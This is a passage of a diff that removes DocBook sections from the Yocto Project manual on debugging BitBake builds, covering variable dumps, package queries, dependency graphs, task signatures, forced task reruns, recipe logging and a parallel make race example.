-                <filename>bitbake.conf</filename> and so forth) have been
-                parsed:
-                <literallayout class='monospaced'>
-     $ bitbake -e
-                </literallayout>
-                The following command displays variable values after a specific
-                recipe has been parsed.
-                The variables include those from the configuration as well:
-                <literallayout class='monospaced'>
-     $ bitbake -e recipename
-                </literallayout>
-                <note><para>
-                    Each recipe has its own private set of variables
-                    (datastore).
-                    Internally, after parsing the configuration, a copy of the
-                    resulting datastore is made prior to parsing each recipe.
-                    This copying implies that variables set in one recipe will
-                    not be visible to other recipes.</para>
-
-                    <para>Likewise, each task within a recipe gets a private
-                    datastore based on the recipe datastore, which means that
-                    variables set within one task will not be visible to
-                    other tasks.</para>
-                </note>
-            </para>
-
-            <para>
-                In the output of <filename>bitbake -e</filename>, each
-                variable is preceded by a description of how the variable
-                got its value, including temporary values that were later
-                overriden.
-                This description also includes variable flags (varflags) set on
-                the variable.
-                The output can be very helpful during debugging.
-            </para>
-
-            <para>
-                Variables that are exported to the environment are preceded by
-                <filename>export</filename> in the output of
-                <filename>bitbake -e</filename>.
-                See the following example:
-                <literallayout class='monospaced'>
-     export CC="i586-poky-linux-gcc -m32 -march=i586 --sysroot=/home/ulf/poky/build/tmp/sysroots/qemux86"
-                </literallayout>
-            </para>
-
-            <para>
-                In addition to variable values, the output of the
-                <filename>bitbake -e</filename> and
-                <filename>bitbake -e</filename>&nbsp;<replaceable>recipe</replaceable>
-                commands includes the following information:
-                <itemizedlist>
-                    <listitem><para>
-                        The output starts with a tree listing all configuration
-                        files and classes included globally, recursively listing
-                        the files they include or inherit in turn.
-                        Much of the behavior of the OpenEmbedded build system
-                        (including the behavior of the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#normal-recipe-build-tasks'>normal recipe build tasks</ulink>)
-                        is implemented in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-base'><filename>base</filename></ulink>
-                        class and the classes it inherits, rather than being
-                        built into BitBake itself.
-                        </para></listitem>
-                    <listitem><para>
-                        After the variable values, all functions appear in the
-                        output.
-                        For shell functions, variables referenced within the
-                        function body are expanded.
-                        If a function has been modified using overrides or
-                        using override-style operators like
-                        <filename>_append</filename> and
-                        <filename>_prepend</filename>, then the final assembled
-                        function body appears in the output.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id='viewing-package-information-with-oe-pkgdata-util'>
-            <title>Viewing Package Information with <filename>oe-pkgdata-util</filename></title>
-
-            <para>
-                You can use the <filename>oe-pkgdata-util</filename>
-                command-line utility to query
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
-                and display various package-related information.
-                When you use the utility, you must use it to view information
-                on packages that have already been built.
-            </para>
-
-            <para>
-                Following are a few of the available
-                <filename>oe-pkgdata-util</filename> subcommands.
-                <note>
-                    You can use the standard * and ? globbing wildcards as part
-                    of package names and paths.
-                </note>
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>oe-pkgdata-util list-pkgs [</filename><replaceable>pattern</replaceable><filename>]</filename>:
-                        Lists all packages that have been built, optionally
-                        limiting the match to packages that match
-                        <replaceable>pattern</replaceable>.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>oe-pkgdata-util list-pkg-files&nbsp;</filename><replaceable>package</replaceable><filename>&nbsp;...</filename>:
-                        Lists the files and directories contained in the given
-                        packages.
-                        <note>
-                            <para>
-                            A different way to view the contents of a package is
-                            to look at the
-                            <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/packages-split</filename>
-                            directory of the recipe that generates the
-                            package.
-                            This directory is created by the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                            task and has one subdirectory for each package the
-                            recipe generates, which contains the files stored in
-                            that package.</para>
-                            <para>
-                            If you want to inspect the
-                            <filename>${WORKDIR}/packages-split</filename>
-                            directory, make sure that
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-rm-work'><filename>rm_work</filename></ulink>
-                            is not enabled when you build the recipe.
-                            </para>
-                            </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>oe-pkgdata-util find-path&nbsp;</filename><replaceable>path</replaceable><filename>&nbsp;...</filename>:
-                        Lists the names of the packages that contain the given
-                        paths.
-                        For example, the following tells us that
-                        <filename>/usr/share/man/man1/make.1</filename>
-                        is contained in the <filename>make-doc</filename>
-                        package:
-                        <literallayout class='monospaced'>
-     $ oe-pkgdata-util find-path /usr/share/man/man1/make.1
-     make-doc: /usr/share/man/man1/make.1
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>oe-pkgdata-util lookup-recipe&nbsp;</filename><replaceable>package</replaceable><filename>&nbsp;...</filename>:
-                        Lists the name of the recipes that
-                        produce the given packages.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                For more information on the <filename>oe-pkgdata-util</filename>
-                command, use the help facility:
-                <literallayout class='monospaced'>
-     $ oe-pkgdata-util &dash;&dash;help
-     $ oe-pkgdata-util <replaceable>subcommand</replaceable> --help
-                </literallayout>
-            </para>
-        </section>
-
-        <section id='dev-viewing-dependencies-between-recipes-and-tasks'>
-            <title>Viewing Dependencies Between Recipes and Tasks</title>
-
-            <para>
-                Sometimes it can be hard to see why BitBake wants to build other
-                recipes before the one you have specified.
-                Dependency information can help you understand why a recipe is
-                built.
-            </para>
-
-            <para>
-                To generate dependency information for a recipe, run the
-                following command:
-                <literallayout class='monospaced'>
-     $ bitbake -g <replaceable>recipename</replaceable>
-                </literallayout>
-                This command writes the following files in the current
-                directory:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>pn-buildlist</filename>: A list of
-                        recipes/targets involved in building
-                        <replaceable>recipename</replaceable>.
-                        "Involved" here means that at least one task from the
-                         recipe needs to run when building
-                        <replaceable>recipename</replaceable> from scratch.
-                        Targets that are in
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-ASSUME_PROVIDED'><filename>ASSUME_PROVIDED</filename></ulink>
-                        are not listed.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>task-depends.dot</filename>: A graph showing
-                        dependencies between tasks.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                The graphs are in
-                <ulink url='https://en.wikipedia.org/wiki/DOT_%28graph_description_language%29'>DOT</ulink>
-                format and can be converted to images (e.g. using the
-                <filename>dot</filename> tool from
-                <ulink url='http://www.graphviz.org/'>Graphviz</ulink>).
-                <note><title>Notes</title>
-                    <itemizedlist>
-                        <listitem><para>
-                            DOT files use a plain text format.
-                            The graphs generated using the
-                            <filename>bitbake -g</filename> command are often so
-                            large as to be difficult to read without special
-                            pruning (e.g. with Bitbake's
-                            <filename>-I</filename> option) and processing.
-                            Despite the form and size of the graphs, the
-                            corresponding <filename>.dot</filename> files can
-                            still be possible to read and provide useful
-                            information.
-                            </para>
-
-                            <para>As an example, the
-                            <filename>task-depends.dot</filename> file contains
-                            lines such as the following:
-                            <literallayout class='monospaced'>
-     "libxslt.do_configure" -> "libxml2.do_populate_sysroot"
-                            </literallayout>
-                            The above example line reveals that the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-configure'><filename>do_configure</filename></ulink>
-                            task in <filename>libxslt</filename> depends on the
-                            <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-populate_sysroot'><filename>do_populate_sysroot</filename></ulink>
-                            task in <filename>libxml2</filename>, which is a
-                            normal
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-DEPENDS'><filename>DEPENDS</filename></ulink>
-                            dependency between the two recipes.
-                            </para></listitem>
-                        <listitem><para>
-                            For an example of how <filename>.dot</filename>
-                            files can be processed, see the
-                            <filename>scripts/contrib/graph-tool</filename>
-                            Python script, which finds and displays paths
-                            between graph nodes.
-                            </para></listitem>
-                    </itemizedlist>
-                </note>
-            </para>
-
-            <para>
-                You can use a different method to view dependency information
-                by using the following command:
-                <literallayout class='monospaced'>
-     $ bitbake -g -u taskexp <replaceable>recipename</replaceable>
-                </literallayout>
-                This command displays a GUI window from which you can view
-                build-time and runtime dependencies for the recipes involved in
-                building <replaceable>recipename</replaceable>.
-            </para>
-        </section>
-
-        <section id='dev-viewing-task-variable-dependencies'>
-            <title>Viewing Task Variable Dependencies</title>
-
-            <para>
-                As mentioned in the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#checksums'>Checksums (Signatures)</ulink>"
-                section of the BitBake User Manual, BitBake tries to
-                automatically determine what variables a task depends on so
-                that it can rerun the task if any values of the variables
-                change.
-                This determination is usually reliable.
-                However, if you do things like construct variable names at
-                runtime, then you might have to manually declare dependencies
-                on those variables using <filename>vardeps</filename> as
-                described in the
-                "<ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'>Variable Flags</ulink>"
-                section of the BitBake User Manual.
-            </para>
-
-            <para>
-                If you are unsure whether a variable dependency is being
-                picked up automatically for a given task, you can list the
-                variable dependencies BitBake has determined by doing the
-                following:
-                <orderedlist>
-                    <listitem><para>
-                        Build the recipe containing the task:
-                        <literallayout class='monospaced'>
-     $ bitbake <replaceable>recipename</replaceable>
-                        </literallayout>
-                        </para></listitem>
-                    <listitem><para>
-                        Inside the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-STAMPS_DIR'><filename>STAMPS_DIR</filename></ulink>
-                        directory, find the signature data
-                        (<filename>sigdata</filename>) file that corresponds
-                        to the task.
-                        The <filename>sigdata</filename> files contain a pickled
-                        Python database of all the metadata that went into
-                        creating the input checksum for the task.
-                        As an example, for the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-fetch'><filename>do_fetch</filename></ulink>
-                        task of the <filename>db</filename> recipe, the
-                        <filename>sigdata</filename> file might be found in the
-                        following location:
-                        <literallayout class='monospaced'>
-     ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
-                        </literallayout>
-                        For tasks that are accelerated through the shared state
-                        (<ulink url='&YOCTO_DOCS_OM_URL;#shared-state-cache'>sstate</ulink>)
-                        cache, an additional <filename>siginfo</filename> file
-                        is written into
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>
-                        along with the cached task output.
-                        The <filename>siginfo</filename> files contain exactly
-                        the same information as <filename>sigdata</filename>
-                        files.
-                        </para></listitem>
-                    <listitem><para>
-                        Run <filename>bitbake-dumpsig</filename> on the
-                        <filename>sigdata</filename> or
-                        <filename>siginfo</filename> file.
-                        Here is an example:
-                        <literallayout class='monospaced'>
-     $ bitbake-dumpsig ${BUILDDIR}/tmp/stamps/i586-poky-linux/db/6.0.30-r1.do_fetch.sigdata.7c048c18222b16ff0bcee2000ef648b1
-                        </literallayout>
-                        In the output of the above command, you will find a
-                        line like the following, which lists all the (inferred)
-                        variable dependencies for the task.
-                        This list also includes indirect dependencies from
-                        variables depending on other variables, recursively.
-                        <literallayout class='monospaced'>
-     Task dependencies: ['PV', 'SRCREV', 'SRC_URI', 'SRC_URI[md5sum]', 'SRC_URI[sha256sum]', 'base_do_fetch']
-                        </literallayout>
-                        <note>
-                            Functions (e.g. <filename>base_do_fetch</filename>)
-                            also count as variable dependencies.
-                            These functions in turn depend on the variables they
-                            reference.
-                        </note>
-                        The output of <filename>bitbake-dumpsig</filename> also
-                        includes the value each variable had, a list of
-                        dependencies for each variable, and
-                        <ulink url='&YOCTO_DOCS_BB_URL;#var-BB_HASHBASE_WHITELIST'><filename>BB_HASHBASE_WHITELIST</filename></ulink>
-                        information.
-                        </para></listitem>
-                </orderedlist>
-            </para>
-
-            <para>
-                There is also a <filename>bitbake-diffsigs</filename> command
-                for comparing two <filename>siginfo</filename> or
-                <filename>sigdata</filename> files.
-                This command can be helpful when trying to figure out what
-                changed between two versions of a task.
-                If you call <filename>bitbake-diffsigs</filename> with just one
-                file, the command behaves like
-                <filename>bitbake-dumpsig</filename>.
-            </para>
-
-            <para>
-                You can also use BitBake to dump out the signature construction
-                information without executing tasks by using either of the
-                following BitBake command-line options:
-                <literallayout class='monospaced'>
-     &dash;&dash;dump-signatures=<replaceable>SIGNATURE_HANDLER</replaceable>
-     -S <replaceable>SIGNATURE_HANDLER</replaceable>
-                </literallayout>
-                <note>
-                    Two common values for
-                    <replaceable>SIGNATURE_HANDLER</replaceable> are "none" and
-                    "printdiff", which dump only the signature or compare the
-                    dumped signature with the cached one, respectively.
-                </note>
-                Using BitBake with either of these options causes BitBake to
-                dump out <filename>sigdata</filename> files in the
-                <filename>stamps</filename> directory for every task it would
-                have executed instead of building the specified target package.
-            </para>
-        </section>
-
-        <section id='dev-viewing-metadata-used-to-create-the-input-signature-of-a-shared-state-task'>
-            <title>Viewing Metadata Used to Create the Input Signature of a Shared State Task</title>
-
-            <para>
-                Seeing what metadata went into creating the input signature
-                of a shared state (sstate) task can be a useful debugging
-                aid.
-                This information is available in signature information
-                (<filename>siginfo</filename>) files in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-SSTATE_DIR'><filename>SSTATE_DIR</filename></ulink>.
-                For information on how to view and interpret information in
-                <filename>siginfo</filename> files, see the
-                "<link linkend='dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</link>"
-                section.
-            </para>
-
-            <para>
-                For conceptual information on shared state, see the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#shared-state'>Shared State</ulink>"
-                section in the Yocto Project Overview and Concepts Manual.
-            </para>
-        </section>
-
-        <section id='dev-invalidating-shared-state-to-force-a-task-to-run'>
-            <title>Invalidating Shared State to Force a Task to Run</title>
-
-            <para>
-                The OpenEmbedded build system uses
-                <ulink url='&YOCTO_DOCS_OM_URL;#overview-checksums'>checksums</ulink>
-                and
-                <ulink url='&YOCTO_DOCS_OM_URL;#shared-state'>shared state</ulink>
-                cache to avoid unnecessarily rebuilding tasks.
-                Collectively, this scheme is known as "shared state code."
-            </para>
-
-            <para>
-                As with all schemes, this one has some drawbacks.
-                It is possible that you could make implicit changes to your
-                code that the checksum calculations do not take into
-                account.
-                These implicit changes affect a task's output but do not
-                trigger the shared state code into rebuilding a recipe.
-                Consider an example during which a tool changes its output.
-                Assume that the output of <filename>rpmdeps</filename>
-                changes.
-                The result of the change should be that all the
-                <filename>package</filename> and
-                <filename>package_write_rpm</filename> shared state cache
-                items become invalid.
-                However, because the change to the output is
-                external to the code and therefore implicit,
-                the associated shared state cache items do not become
-                invalidated.
-                In this case, the build process uses the cached items
-                rather than running the task again.
-                Obviously, these types of implicit changes can cause
-                problems.
-            </para>
-
-            <para>
-                To avoid these problems during the build, you need to
-                understand the effects of any changes you make.
-                Realize that changes you make directly to a function
-                are automatically factored into the checksum calculation.
-                Thus, these explicit changes invalidate the associated
-                area of shared state cache.
-                However, you need to be aware of any implicit changes that
-                are not obvious changes to the code and could affect
-                the output of a given task.
-            </para>
-
-            <para>
-                When you identify an implicit change, you can easily
-                take steps to invalidate the cache and force the tasks
-                to run.
-                The steps you can take are as simple as changing a
-                function's comments in the source code.
-                For example, to invalidate package shared state files,
-                change the comment statements of
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-package'><filename>do_package</filename></ulink>
-                or the comments of one of the functions it calls.
-                Even though the change is purely cosmetic, it causes the
-                checksum to be recalculated and forces the build system to
-                run the task again.
-                <note>
-                    For an example of a commit that makes a cosmetic
-                    change to invalidate shared state, see this
-                    <ulink url='&YOCTO_GIT_URL;/cgit.cgi/poky/commit/meta/classes/package.bbclass?id=737f8bbb4f27b4837047cb9b4fbfe01dfde36d54'>commit</ulink>.
-                </note>
-            </para>
-        </section>
-
-        <section id='dev-debugging-taskrunning'>
-            <title>Running Specific Tasks</title>
-
-            <para>
-                Any given recipe consists of a set of tasks.
-                The standard BitBake behavior in most cases is:
-                <filename>do_fetch</filename>,
-                <filename>do_unpack</filename>,
-                <filename>do_patch</filename>,
-                <filename>do_configure</filename>,
-                <filename>do_compile</filename>,
-                <filename>do_install</filename>,
-                <filename>do_package</filename>,
-                <filename>do_package_write_*</filename>, and
-                <filename>do_build</filename>.
-                The default task is <filename>do_build</filename> and any tasks
-                on which it depends build first.
-                Some tasks, such as <filename>do_devshell</filename>, are not
-                part of the default build chain.
-                If you wish to run a task that is not part of the default build
-                chain, you can use the <filename>-c</filename> option in
-                BitBake.
-                Here is an example:
-                <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -c devshell
-                </literallayout>
-            </para>
-
-            <para>
-                The <filename>-c</filename> option respects task dependencies,
-                which means that all other tasks (including tasks from other
-                recipes) that the specified task depends on will be run before
-                the task.
-                Even when you manually specify a task to run with
-                <filename>-c</filename>, BitBake will only run the task if it
-                considers it "out of date".
-                See the
-                "<ulink url='&YOCTO_DOCS_OM_URL;#stamp-files-and-the-rerunning-of-tasks'>Stamp Files and the Rerunning of Tasks</ulink>"
-                section in the Yocto Project Overview and Concepts Manual for
-                how BitBake determines whether a task is "out of date".
-            </para>
-
-            <para>
-                If you want to force an up-to-date task to be rerun (e.g.
-                because you made manual modifications to the recipe's
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink>
-                that you want to try out), then you can use the
-                <filename>-f</filename> option.
-                <note>
-                    The reason <filename>-f</filename> is never required when
-                    running the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-devshell'><filename>do_devshell</filename></ulink>
-                    task is because the
-                    <filename>[</filename><ulink url='&YOCTO_DOCS_BB_URL;#variable-flags'><filename>nostamp</filename></ulink><filename>]</filename>
-                    variable flag is already set for the task.
-                </note>
-                The following example shows one way you can use the
-                <filename>-f</filename> option:
-                <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop
-               .
-               .
-     make some changes to the source code in the work directory
-               .
-               .
-     $ bitbake matchbox-desktop -c compile -f
-     $ bitbake matchbox-desktop
-                </literallayout>
-            </para>
-
-            <para>
-                This sequence first builds and then recompiles
-                <filename>matchbox-desktop</filename>.
-                The last command reruns all tasks (basically the packaging
-                tasks) after the compile.
-                BitBake recognizes that the <filename>do_compile</filename>
-                task was rerun and therefore understands that the other tasks
-                also need to be run again.
-            </para>
-
-            <para>
-                Another, shorter way to rerun a task and all
-                <ulink url='&YOCTO_DOCS_REF_URL;#normal-recipe-build-tasks'>normal recipe build tasks</ulink>
-                that depend on it is to use the <filename>-C</filename>
-                option.
-                <note>
-                    This option is upper-cased and is separate from the
-                    <filename>-c</filename> option, which is lower-cased.
-                </note>
-                Using this option invalidates the given task and then runs the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-build'><filename>do_build</filename></ulink>
-                task, which is the default task if no task is given, and the
-                tasks on which it depends.
-                You could replace the final two commands in the previous example
-                with the following single command:
-                <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -C compile
-                </literallayout>
-                Internally, the <filename>-f</filename> and
-                <filename>-C</filename> options work by tainting (modifying) the
-                input checksum of the specified task.
-                This tainting indirectly causes the task and its
-                dependent tasks to be rerun through the normal task dependency
-                mechanisms.
-                <note>
-                    BitBake explicitly keeps track of which tasks have been
-                    tainted in this fashion, and will print warnings such as the
-                    following for builds involving such tasks:
-                    <literallayout class='monospaced'>
-     WARNING: /home/ulf/poky/meta/recipes-sato/matchbox-desktop/matchbox-desktop_2.1.bb.do_compile is tainted from a forced run
-                    </literallayout>
-                    The purpose of the warning is to let you know that the work
-                    directory and build output might not be in the clean state
-                    they would be in for a "normal" build, depending on what
-                    actions you took.
-                    To get rid of such warnings, you can remove the work
-                    directory and rebuild the recipe, as follows:
-                    <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -c clean
-     $ bitbake matchbox-desktop
-                    </literallayout>
-                </note>
-            </para>
-
-            <para>
-                You can view a list of tasks in a given package by running the
-                <filename>do_listtasks</filename> task as follows:
-                <literallayout class='monospaced'>
-     $ bitbake matchbox-desktop -c listtasks
-                </literallayout>
-                The results appear as output to the console and are also in the
-                file <filename>${WORKDIR}/temp/log.do_listtasks</filename>.
-            </para>
-        </section>
-
-        <section id='dev-debugging-bitbake'>
-            <title>General BitBake Problems</title>
-
-            <para>
-                You can see debug output from BitBake by using the
-                <filename>-D</filename> option.
-                The debug output gives more information about what BitBake
-                is doing and the reason behind it.
-                Each <filename>-D</filename> option you use increases the
-                logging level.
-                The most common usage is <filename>-DDD</filename>.
-            </para>
-
-            <para>
-                The output from
-                <filename>bitbake -DDD -v</filename> <replaceable>targetname</replaceable>
-                can reveal why BitBake chose a certain version of a package or
-                why BitBake picked a certain provider.
-                This command could also help you in a situation where you think
-                BitBake did something unexpected.
-            </para>
-        </section>
-
-        <section id='dev-debugging-buildfile'>
-            <title>Building with No Dependencies</title>
-
-            <para>
-                To build a specific recipe (<filename>.bb</filename> file),
-                you can use the following command form:
-                <literallayout class='monospaced'>
-     $ bitbake -b <replaceable>somepath</replaceable>/<replaceable>somerecipe</replaceable>.bb
-                </literallayout>
-                This command form does not check for dependencies.
-                Consequently, you should use it only when you know existing
-                dependencies have been met.
-                <note>
-                    You can also specify fragments of the filename.
-                    In this case, BitBake checks for a unique match.
-                </note>
-            </para>
-        </section>
-
-        <section id='recipe-logging-mechanisms'>
-            <title>Recipe Logging Mechanisms</title>
-
-            <para>
-                The Yocto Project provides several logging functions for
-                producing debugging output and reporting errors and warnings.
-                For Python functions, the following logging functions exist.
-                All of these functions log to
-                <filename>${T}/log.do_</filename><replaceable>task</replaceable>,
-                and can also log to standard output (stdout) with the right
-                settings:
-                <itemizedlist>
-                    <listitem><para>
-                        <filename>bb.plain(</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        Writes <replaceable>msg</replaceable> as is to the
-                        log while also logging to stdout.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>bb.note(</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        Writes "NOTE: <replaceable>msg</replaceable>" to the
-                        log.
-                        Also logs to stdout if BitBake is called with "-v".
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>bb.debug(</filename><replaceable>level</replaceable><filename>,&nbsp;</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        Writes "DEBUG: <replaceable>msg</replaceable>" to the
-                        log.
-                        Also logs to stdout if the log level is greater than or
-                        equal to <replaceable>level</replaceable>.
-                        See the
-                        "<ulink url='&YOCTO_DOCS_BB_URL;#usage-and-syntax'>-D</ulink>"
-                        option in the BitBake User Manual for more information.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>bb.warn(</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        Writes "WARNING: <replaceable>msg</replaceable>" to the
-                        log while also logging to stdout.
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>bb.error(</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        Writes "ERROR: <replaceable>msg</replaceable>" to the
-                        log while also logging to standard out (stdout).
-                        <note>
-                            Calling this function does not cause the task to fail.
-                        </note>
-                        </para></listitem>
-                    <listitem><para>
-                        <filename>bb.fatal(</filename><replaceable>msg</replaceable><filename>)</filename>:
-                        This logging function is similar to
-                        <filename>bb.error(</filename><replaceable>msg</replaceable><filename>)</filename>
-                        but also causes the calling task to fail.
-                        <note>
-                            <filename>bb.fatal()</filename> raises an exception,
-                            which means you do not need to put a "return"
-                            statement after the function.
-                        </note>
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                The same logging functions are also available in shell
-                functions, under the names
-                <filename>bbplain</filename>, <filename>bbnote</filename>,
-                <filename>bbdebug</filename>, <filename>bbwarn</filename>,
-                <filename>bberror</filename>, and <filename>bbfatal</filename>.
-                The
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-logging'><filename>logging</filename></ulink>
-                class implements these functions.
-                See that class in the
-                <filename>meta/classes</filename> folder of the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
-                for information.
-            </para>
-
-            <section id='logging-with-python'>
-                <title>Logging With Python</title>
-
-                <para>
-                    When creating recipes using Python and inserting code that
-                    handles build logs, keep in mind the goal is to have
-                    informative logs while keeping the console as "silent" as
-                    possible.
-                    Also, if you want status messages in the log, use the
-                    "debug" loglevel.
-                </para>
-
-                <para>
-                    Following is an example written in Python.
-                    The code handles logging for a function that determines the
-                    number of tasks needed to be run.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-listtasks'><filename>do_listtasks</filename></ulink>"
-                    section for additional information:
-                    <literallayout class='monospaced'>
-     python do_listtasks() {
-         bb.debug(2, "Starting to figure out the task list")
-         if noteworthy_condition:
-             bb.note("There are 47 tasks to run")
-         bb.debug(2, "Got to point xyz")
-         if warning_trigger:
-             bb.warn("Detected warning_trigger, this might be a problem later.")
-         if recoverable_error:
-             bb.error("Hit recoverable_error, you really need to fix this!")
-         if fatal_error:
-             bb.fatal("fatal_error detected, unable to print the task list")
-         bb.plain("The tasks present are abc")
-         bb.debug(2, "Finished figuring out the tasklist")
-     }
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='logging-with-bash'>
-                <title>Logging With Bash</title>
-
-                <para>
-                    When creating recipes using Bash and inserting code that
-                    handles build logs, you have the same goals - informative
-                    with minimal console output.
-                    The syntax you use for recipes written in Bash is similar
-                    to that of recipes written in Python described in the
-                    previous section.
-                </para>
-
-                <para>
-                    Following is an example written in Bash.
-                    The code logs the progress of the <filename>do_my_function</filename> function.
-                    <literallayout class='monospaced'>
-     do_my_function() {
-         bbdebug 2 "Running do_my_function"
-         if [ exceptional_condition ]; then
-             bbnote "Hit exceptional_condition"
-         fi
-         bbdebug 2  "Got to point xyz"
-         if [ warning_trigger ]; then
-             bbwarn "Detected warning_trigger, this might cause a problem later."
-         fi
-         if [ recoverable_error ]; then
-             bberror "Hit recoverable_error, correcting"
-         fi
-         if [ fatal_error ]; then
-             bbfatal "fatal_error detected"
-         fi
-         bbdebug 2 "Completed do_my_function"
-     }
-                    </literallayout>
-                </para>
-            </section>
-        </section>
-
-        <section id='debugging-parallel-make-races'>
-            <title>Debugging Parallel Make Races</title>
-
-            <para>
-                A parallel <filename>make</filename> race occurs when the build
-                consists of several parts that are run simultaneously and
-                a situation occurs when the output or result of one
-                part is not ready for use with a different part of the build
-                that depends on that output.
-                Parallel make races are annoying and can sometimes be difficult
-                to reproduce and fix.
-                However, some simple tips and tricks exist that can help
-                you debug and fix them.
-                This section presents a real-world example of an error
-                encountered on the Yocto Project autobuilder and the process
-                used to fix it.
-                <note>
-                    If you cannot properly fix a <filename>make</filename> race
-                    condition, you can work around it by clearing either the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKE'><filename>PARALLEL_MAKE</filename></ulink>
-                    or
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PARALLEL_MAKEINST'><filename>PARALLEL_MAKEINST</filename></ulink>
-                    variables.
-                </note>
-            </para>
-
-            <section id='the-failure'>
-                <title>The Failure</title>
-
-                <para>
-                    For this example, assume that you are building an image that
-                    depends on the "neard" package.
-                    And, during the build, BitBake runs into problems and
-                    creates the following output.
-                    <note>
-                        This example log file has longer lines artificially
-                        broken to make the listing easier to read.
-                    </note>
-                    If you examine the output or the log file, you see the
-                    failure during <filename>make</filename>:
-                    <literallayout class='monospaced'>
-     | DEBUG: SITE files ['endian-little', 'bit-32', 'ix86-common', 'common-linux', 'common-glibc', 'i586-linux', 'common']
-     | DEBUG: Executing shell function do_compile
-     | NOTE: make -j 16
-     | make --no-print-directory all-am
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/types.h include/near/types.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/log.h include/near/log.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/plugin.h include/near/plugin.h
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/tag.h include/near/tag.h
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/adapter.h include/near/adapter.h
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/ndef.h include/near/ndef.h
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/tlv.h include/near/tlv.h
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/setting.h include/near/setting.h
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | /bin/mkdir -p include/near
-     | ln -s /home/pokybuild/yocto-autobuilder/yocto-slave/nightly-x86/build/build/tmp/work/i586-poky-linux/neard/
-       0.14-r0/neard-0.14/include/device.h include/near/device.h
